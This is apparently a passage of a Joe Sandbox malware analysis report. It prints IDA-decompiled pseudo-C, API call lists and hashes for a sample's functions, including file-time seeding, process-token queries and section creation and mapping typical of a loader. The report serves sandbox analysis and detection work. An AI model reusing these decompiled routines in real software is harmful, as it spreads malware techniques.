                                                                                                                                                                                                                                    							_a4 = _t22 + 2;
                                                                                                                                                                                                                                    							_t22 = E02F9A911(_t26);
                                                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                    							__imp__(_t34, _a4);
                                                                                                                                                                                                                                    							 *_t30 = 0x2f;
                                                                                                                                                                                                                                    							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                    							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                    							__imp__(_t30, _v8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_a8 = _t34;
                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                    						 *_a12 = _t30;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000), ref: 02F97F33
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                      • Part of subcall function 02F9A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02F97F61,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102), ref: 02F9A91F
                                                                                                                                                                                                                                      • Part of subcall function 02F9A911: StrChrA.SHLWAPI(?,0000003F,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F9A929
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?), ref: 02F97F91
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FA1
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FAD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                    • Opcode ID: d50f567493e9cf3de5515fe077c9ad1dcfd280db3429af3ec88a74adc26568f9
                                                                                                                                                                                                                                    • Instruction ID: 7441eaec56f70491a495680ea26bda811e8d26e98e0efada38f9a4ab6a09f166
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50f567493e9cf3de5515fe077c9ad1dcfd280db3429af3ec88a74adc26568f9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA218EB2904319EBDF12AFA5DC44BAEFFA9AF466C8F054055FA05AB211D735C9008BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                    				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                    				_t18 = E02F92049(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                    				_v8 = _t18;
                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                    					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                    					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                    					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,76D25520,?,00000008,033E937C,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CC8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(02F9747C,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CCF
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,76D269A0,?,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CEF
                                                                                                                                                                                                                                    • memcpy.NTDLL(76D269A0,02F9747C,00000002,00000000,004F0053,76D269A0,?,?,02F9747C,004F0053,033E937C), ref: 02F97D02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                    • Opcode ID: 02c7d1cc8ebdae5b037073c8e892bf563e2ec7dac2a9c93a38ed1aa795f9240f
                                                                                                                                                                                                                                    • Instruction ID: 1afb95f6837c5af341912adba4f7b2184ca82b8fd73f425c8f0af3c0fc00550b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c7d1cc8ebdae5b037073c8e892bf563e2ec7dac2a9c93a38ed1aa795f9240f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0FF76900118BBDF11EFA9CC45CDE7BADEF493987554062EE08D7211E731EA14DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F93CE0
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                    • Opcode ID: d02f760e1e45257433b4dc1efaf305a4c2b0251c0c6015c98e78dfc40f389ce2
                                                                                                                                                                                                                                    • Instruction ID: e88e16cc68f0a018a263635822ef3b10c271f1ad9fb2757661248674c0bcadd6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d02f760e1e45257433b4dc1efaf305a4c2b0251c0c6015c98e78dfc40f389ce2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E01273D01229A78B119FE9AC48C6FFBADEF8DB91B054817FA01D3124D7259825CBE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E023E12D4(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				CHAR* _v20;
                                                                                                                                                                                                                                    				struct _FILETIME _v28;
                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                    				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x23ed278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x23ed238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x23ed278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x23ed238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x23ed238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x23ed278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x23ed27c; // 0x28da5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x23ee7f2; // 0x73797325
				_t83 = E023E95B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x23ed238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x23ed27c; // 0x28da5a8
				_t16 = _t93 + 0x23ee813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                    						if(_t119 == 0) {
                                                                                                                                                                                                                                    							FindClose(_v16);
                                                                                                                                                                                                                                    							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                                                    					_v12 = _v12 + 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x023e1528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 023E12FF
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 023E1321
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E133B
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,023E23E9,63699BCE,023E1354,73797325), ref: 023E95C2
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 023E95DC
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 023E1379
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 023E138D
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 023E13A4
                                                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 023E13B0
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 023E13F1
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 023E1407
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E1425
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(023E96C1,?), ref: 023E1439
                                                                                                                                                                                                                                    • FindClose.KERNEL32(023E96C1), ref: 023E1446
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 023E1452
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E1474
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 023E14A7
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 023E14E0
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(023E96C1,?), ref: 023E14F5
                                                                                                                                                                                                                                    • FindClose.KERNEL32(023E96C1), ref: 023E1502
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 023E150E
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E151E
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(023E96C1), ref: 023E1553
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 023E1565
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E1575
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                                                    • Opcode ID: 971fc63b216bce1e3c7d5c510ff227b5ea8d11727d75de09293a2ed65e2fbb22
                                                                                                                                                                                                                                    • Instruction ID: be4ddb52db063d6af2cbb69b026561efe23a8099504c879071c2cf2538b6f318
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 971fc63b216bce1e3c7d5c510ff227b5ea8d11727d75de09293a2ed65e2fbb22
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D8118B1D00119EFDF218FA5DC44AEEBBBDBF44300F104966E556EA290D7309A58CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E023E83B7(char _a4, void* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				void** _t33;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                    				void** _t44;
                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_v44 = 0x18;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                    					_t33 =  &_v8;
                                                                                                                                                                                                                                    					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                    					if(_t33 >= 0) {
                                                                                                                                                                                                                                    						_t47 = __imp__;
                                                                                                                                                                                                                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                    						_t44 = E023E2049(_a4);
                                                                                                                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                                                                                                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    							if(_t40 >= 0) {
                                                                                                                                                                                                                                    								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                    								_t48 = 1;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							E023E9039(_t44);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						NtClose(_v8); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					NtClose(_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t48;
                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                    0x023e843b
                                                                                                                                                                                                                                    0x023e844a
                                                                                                                                                                                                                                    0x023e844e
                                                                                                                                                                                                                                    0x023e8457
                                                                                                                                                                                                                                    0x023e845f
                                                                                                                                                                                                                                    0x023e845f
                                                                                                                                                                                                                                    0x023e8461
                                                                                                                                                                                                                                    0x023e8461
                                                                                                                                                                                                                                    0x023e8469
                                                                                                                                                                                                                                    0x023e846f
                                                                                                                                                                                                                                    0x023e8473
                                                                                                                                                                                                                                    0x023e8473
                                                                                                                                                                                                                                    0x023e847e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 023E83FE
                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 023E8411
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 023E842D
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 023E844A
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 023E8457
                                                                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 023E8469
                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 023E8473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                    • Opcode ID: d1c4a03039c7f7f3a46e883db1714025550170b71c063c955fff14f7774bb033
                                                                                                                                                                                                                                    • Instruction ID: 405be1f0d922d55a8b4bff728c24d19a0fc926cec1fc05d2c49629f94812d61b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c4a03039c7f7f3a46e883db1714025550170b71c063c955fff14f7774bb033
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E52107B1A40228FBDF219F95CC45ADEBFBDEF18744F104422F901AA1A0D7719A599FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E026D1EB5(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t48 = __eax;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_v48 = 0x18;
                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                    				_v36 = 0x40;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                    				if(_t34 < 0) {
                                                                                                                                                                                                                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					 *_t48 = _v16;
                                                                                                                                                                                                                                    					_t39 = E026D1D9F(_t48,  &_v12); // executed
                                                                                                                                                                                                                                    					_t47 = _t39;
                                                                                                                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                    						 *_a4 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t47;
                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 026D1F12
                                                                                                                                                                                                                                      • Part of subcall function 026D1D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,026D1F27,00000002,00000000,?,?,00000000,?,?,026D1F27,00000002), ref: 026D1DCC
                                                                                                                                                                                                                                    • memset.NTDLL ref: 026D1F34
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
